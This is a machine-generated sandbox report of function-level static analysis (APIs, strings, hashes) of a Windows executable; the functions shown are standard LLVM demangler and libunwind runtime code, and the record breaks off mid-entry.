malloc.MSVCRT ref: 00007FF779706999
memcpy.MSVCRT ref: 00007FF7797069B8
realloc.MSVCRT ref: 00007FF779706A61
malloc.MSVCRT ref: 00007FF779706A7A
memcpy.MSVCRT ref: 00007FF779706A99
malloc.MSVCRT ref: 00007FF779706B90
free.MSVCRT ref: 00007FF779706C51
_assert.MSVCRT ref: 00007FF779706C80
_assert.MSVCRT ref: 00007FF779706C9A

Strings

Last != First && "Popping empty vector!", xrefs: 00007FF779706C86
yptn, xrefs: 00007FF7797068C0
'block-literal', xrefs: 00007FF77970682F
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF779706C6C
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779706C73, 00007FF779706C8D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpyrealloc$_assert$freememchr
String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 3787261664-3461159648
Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction ID: 00b476251774b0ed839a6ecc4951f580651f2ef13a187a0864f19b0698ac4322
Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction Fuzzy Hash: DE22946373AF4281DA649F19E85427AB3B4FB48784F948635DA9D07795EF3CE041C3A0

Function 00007FF7796FAD10 Relevance: 32.1, APIs: 12, Strings: 6, Instructions: 591
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF7796FAE6B
free.MSVCRT ref: 00007FF7796FAEE1
memcpy.MSVCRT ref: 00007FF7796FAF1A

Strings

Ua9enabl, xrefs: 00007FF7796FB20E
initializer for module , xrefs: 00007FF7796FB441
Index <= size() && "dropBack() can't expand!", xrefs: 00007FF7796FB8DF
guard variable for , xrefs: 00007FF7796FB19A
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF7796FB8E6
able_ifI, xrefs: 00007FF7796FB21B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpy$free
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index <= size() && "dropBack() can't expand!"$Ua9enabl$able_ifI$guard variable for $initializer for module
API String ID: 2888793982-723539340
Opcode ID: 56c756458f6442a6091dfe210a7685922c485abfd09ba2f0b48504d6191023ce
Instruction ID: 7f958162afb5a5d1e5f7502afaf64a19ab2618a4f88751a5767464cc7e4e4c5d
Opcode Fuzzy Hash: 56c756458f6442a6091dfe210a7685922c485abfd09ba2f0b48504d6191023ce
Instruction Fuzzy Hash: 9B42623363AB8285EA649F25E4443AAB3B7FB85780F944235DA8D87795EF3CE045C350

Function 00007FF7796FA480 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 400
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF7796FA4C9
malloc.MSVCRT ref: 00007FF7796FA813
realloc.MSVCRT ref: 00007FF7796FAA84
free.MSVCRT ref: 00007FF7796FAAFA
free.MSVCRT ref: 00007FF7796FAB14
free.MSVCRT ref: 00007FF7796FAB26
free.MSVCRT ref: 00007FF7796FAB38
free.MSVCRT ref: 00007FF7796FAB47

Strings

____, xrefs: 00007FF7796FA765
Parser.ForwardTemplateRefs.empty(), xrefs: 00007FF7796FAB9B
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp, xrefs: 00007FF7796FABA2
k_invoke, xrefs: 00007FF7796FA909
_block_i, xrefs: 00007FF7796FA8FC
invocation function for block in , xrefs: 00007FF7796FA9B6
___Z, xrefs: 00007FF7796FA752

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: free$mallocreallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp$Parser.ForwardTemplateRefs.empty()$___Z$____$_block_i$invocation function for block in $k_invoke
API String ID: 3545345670-2202808109
Opcode ID: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction ID: 12a0c4361d4d8ca176da793f34228633c0d92626ad32919a86cbe80f508f0348
Opcode Fuzzy Hash: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction Fuzzy Hash: BB127D2392EAC281EA759F04E4542FAA3B6EB94750F805331EA9D42A95FF7CD185CB10

Function 00007FF77970D0F0 Relevance: 15.4, APIs: 9, Strings: 1, Instructions: 416stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970D207
malloc.MSVCRT ref: 00007FF77970D31B
malloc.MSVCRT ref: 00007FF77970D47B
malloc.MSVCRT ref: 00007FF77970D51E
strlen.MSVCRT ref: 00007FF77970D553
malloc.MSVCRT ref: 00007FF77970D5CE
strlen.MSVCRT ref: 00007FF77970D603
malloc.MSVCRT ref: 00007FF77970D67E
strlen.MSVCRT ref: 00007FF77970D6B3

Strings

objcprot, xrefs: 00007FF77970D2A1

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$strlen
String ID: objcprot
API String ID: 832207080-2390413308
Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction ID: 45672b5dafc5353ba50553e2b4035f6698cd44099233cb0e26c0afa57773cac6
Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction Fuzzy Hash: D102063362AB8281EB559F24E8846A977A5EB08BD4F854731DFAC073C5DF38E552C350

Function 00007FF779704440 Relevance: 13.0, APIs: 10, Instructions: 464COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970446C
malloc.MSVCRT ref: 00007FF779704575
malloc.MSVCRT ref: 00007FF779704675
malloc.MSVCRT ref: 00007FF779704700
malloc.MSVCRT ref: 00007FF7797047DA
malloc.MSVCRT ref: 00007FF7797048E8
malloc.MSVCRT ref: 00007FF77970495C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction ID: 6af6ffbd88712ea781de3485ac9404d8ce964339406385f3156026f31f47353c
Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction Fuzzy Hash: 5C22D43362AB8285EBA49F18D4453A977B4FB48BC0F944635DB9C07391EF38E552C364

Function 00007FF779700160 Relevance: 10.9, APIs: 7, Instructions: 377COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF779700280
malloc.MSVCRT ref: 00007FF779700376
malloc.MSVCRT ref: 00007FF7797006A8

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction ID: f277b92dd30d50058202fa769c8b0545de3283f368c22f548d473b360f10b94d
Opcode Fuzzy Hash: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction Fuzzy Hash: 33E1E32363AB8385EA959F18D8407B9A7B5EB49BD1F844135DE8C0B391EF3CE551C3A0

Function 00007FF779712710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF77971271B
GetProcAddress.KERNEL32 ref: 00007FF77971272B

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00007FF779712721
kernel32.dll, xrefs: 00007FF779712714

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 1646373207-706389432
Opcode ID: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction ID: c952d71d3637c1ce4eb4d4a8d454a7c7adf9f2108ac82c9d5027e28c20fe58d8
Opcode Fuzzy Hash: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction Fuzzy Hash: 79E02D26ABBA07C2EA44AF51AC85174A2B0AB99795FC04939C54D06330EE2CA55A83B0

Function 00007FF7797076E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779707A37
memcpy.MSVCRT ref: 00007FF779707A53

Strings

%LaL, xrefs: 00007FF7797079E9

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memcpyrealloc
String ID: %LaL
API String ID: 2500458235-3433341929
Opcode ID: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction ID: e7e04404310a6efe567b2fba6affde746b40570dabf3bae6fb24189e2c243d0f
Opcode Fuzzy Hash: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction Fuzzy Hash: C0916C6BB2C6D113DB394334B540F9D6E60D7A27A2F059315CB7403F9AD92EC2168B00

Function 00007FF7796F92BB Relevance: 2.3, APIs: 1, Instructions: 1088COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b51e2a745836820ae5e51b927a30219108dac0aaa5d01f5bdc8f99822855a4c1
Instruction ID: b0656f37d03c042fbed1128a75ccee25004a63c5aea5304935694bb73c501dc1
Opcode Fuzzy Hash: b51e2a745836820ae5e51b927a30219108dac0aaa5d01f5bdc8f99822855a4c1
Instruction Fuzzy Hash: 8B92C533A3E64386E765AE25A04032BE6B3FB857C4F905235E94E93795FE3CE4418B50

Function 00007FF7796F1B40 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb96e3d47f38f9666091484b2575135f7935362b06e64030a895774840bb5cc
Instruction ID: 581627926768a8e79a5b6610b53cac19d9e9853bf3cfc35143ee3d56bda71803
Opcode Fuzzy Hash: 7eb96e3d47f38f9666091484b2575135f7935362b06e64030a895774840bb5cc
Instruction Fuzzy Hash: 43A11563B3E78242EB14AF15A4107BBA6A3EB857D0F454235DE9D83B85EE3DD045CB10

Function 00007FF7796F4120 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7796F8350: RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7796F84FA

fflush.MSVCRT ref: 00007FF7796F4370
fflush.MSVCRT ref: 00007FF7796F422D

Part of subcall function 00007FF7796F8A70: getenv.MSVCRT ref: 00007FF7796F8A93

fflush.MSVCRT ref: 00007FF7796F4287
fflush.MSVCRT ref: 00007FF7796F42D2
fflush.MSVCRT ref: 00007FF7796F4336
fflush.MSVCRT ref: 00007FF7796F43CE
fflush.MSVCRT ref: 00007FF7796F440E
fflush.MSVCRT ref: 00007FF7796F4448

Strings

libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF7796F4357
libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF7796F42B6
libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF7796F4214
libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF7796F438D
.anonymous., xrefs: 00007FF7796F41E6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF7796F431D
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF7796F43F2
libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF7796F43AE
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF7796F4499
libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF7796F426B
libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF7796F442B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$CaptureContextgetenv
String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
API String ID: 3501801798-3031193476
Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction ID: 68f59d378435775608a337684d45cfce92671050f527cf2c105cd1d22a44e4ef
Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction Fuzzy Hash: 61815112A3E61341FA14BF61A4057BAE273EF86BC4FC00635DE4E97BC6EE2CE5054265

Function 00007FF7796F3820 Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fflush.MSVCRT ref: 00007FF7796F387D
memcpy.MSVCRT ref: 00007FF7796F39F9
fflush.MSVCRT ref: 00007FF7796F3B05
fflush.MSVCRT ref: 00007FF7796F3B5D
RtlUnwindEx.KERNEL32 ref: 00007FF7796F3CEA
fflush.MSVCRT ref: 00007FF7796F3D4A
abort.MSVCRT ref: 00007FF7796F3D4F

Part of subcall function 00007FF7796F8A70: getenv.MSVCRT ref: 00007FF7796F8A93

Strings

Personality installed context during phase 1!, xrefs: 00007FF7796F3C0A
RtlUnwindEx() failed, xrefs: 00007FF7796F3D0C
libunwind: %s - %s, xrefs: 00007FF7796F3B9B, 00007FF7796F3BFC, 00007FF7796F3CFE, 00007FF7796F3D23
libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p), xrefs: 00007FF7796F3AE5
libunwind: _GCC_specific_handler() personality returned %d, xrefs: 00007FF7796F3B40
_GCC_specific_handler, xrefs: 00007FF7796F3BA2, 00007FF7796F3C03, 00007FF7796F3D05, 00007FF7796F3D2A
Personality continued unwind at the target frame!, xrefs: 00007FF7796F3BA9
Personality indicated exception handler in phase 2!, xrefs: 00007FF7796F3D31
CCG!, xrefs: 00007FF7796F3891
CCG , xrefs: 00007FF7796F3884
libunwind: _GCC_specific_handler(%#010lx(%lx), %p), xrefs: 00007FF7796F3863

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$Unwindabortgetenvmemcpy
String ID: CCG $CCG!$Personality continued unwind at the target frame!$Personality indicated exception handler in phase 2!$Personality installed context during phase 1!$RtlUnwindEx() failed$_GCC_specific_handler$libunwind: %s - %s$libunwind: _GCC_specific_handler(%#010lx(%lx), %p)$libunwind: _GCC_specific_handler() calling personality function %p(1, %d, %llx, %p, %p)$libunwind: _GCC_specific_handler() personality returned %d
API String ID: 4246679292-2140983942
Opcode ID: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction ID: 28a30bd5447b695c8969a7862cebc4aba577ff6ab0af55644acf0202db6adc4e
Opcode Fuzzy Hash: 399306ebe4ceb0f237bae98179e1acdd12333d68336ae5344bae23e9d3188841
Instruction Fuzzy Hash: 32D17E22A3AAC282E634AF15E5017EAA376FF84784F805236DE8D43751EF3DE195C750

Function 00007FF779702BCA Relevance: 31.6, APIs: 21, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

isxdigit.MSVCRT ref: 00007FF779702BE5
isxdigit.MSVCRT ref: 00007FF779702BF7
isxdigit.MSVCRT ref: 00007FF779702C09
isxdigit.MSVCRT ref: 00007FF779702C1B
isxdigit.MSVCRT ref: 00007FF779702C2D
isxdigit.MSVCRT ref: 00007FF779702C3F
isxdigit.MSVCRT ref: 00007FF779702C51
isxdigit.MSVCRT ref: 00007FF779702C63
isxdigit.MSVCRT ref: 00007FF779702C75
isxdigit.MSVCRT ref: 00007FF779702C87
isxdigit.MSVCRT ref: 00007FF779702C99
isxdigit.MSVCRT ref: 00007FF779702CAB
isxdigit.MSVCRT ref: 00007FF779702CBD
isxdigit.MSVCRT ref: 00007FF779702CCF
isxdigit.MSVCRT ref: 00007FF779702CE1
isxdigit.MSVCRT ref: 00007FF779702CF3
isxdigit.MSVCRT ref: 00007FF779702D05
isxdigit.MSVCRT ref: 00007FF779702D17
isxdigit.MSVCRT ref: 00007FF779702D29
isxdigit.MSVCRT ref: 00007FF779702D3B
malloc.MSVCRT ref: 00007FF779702D88

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
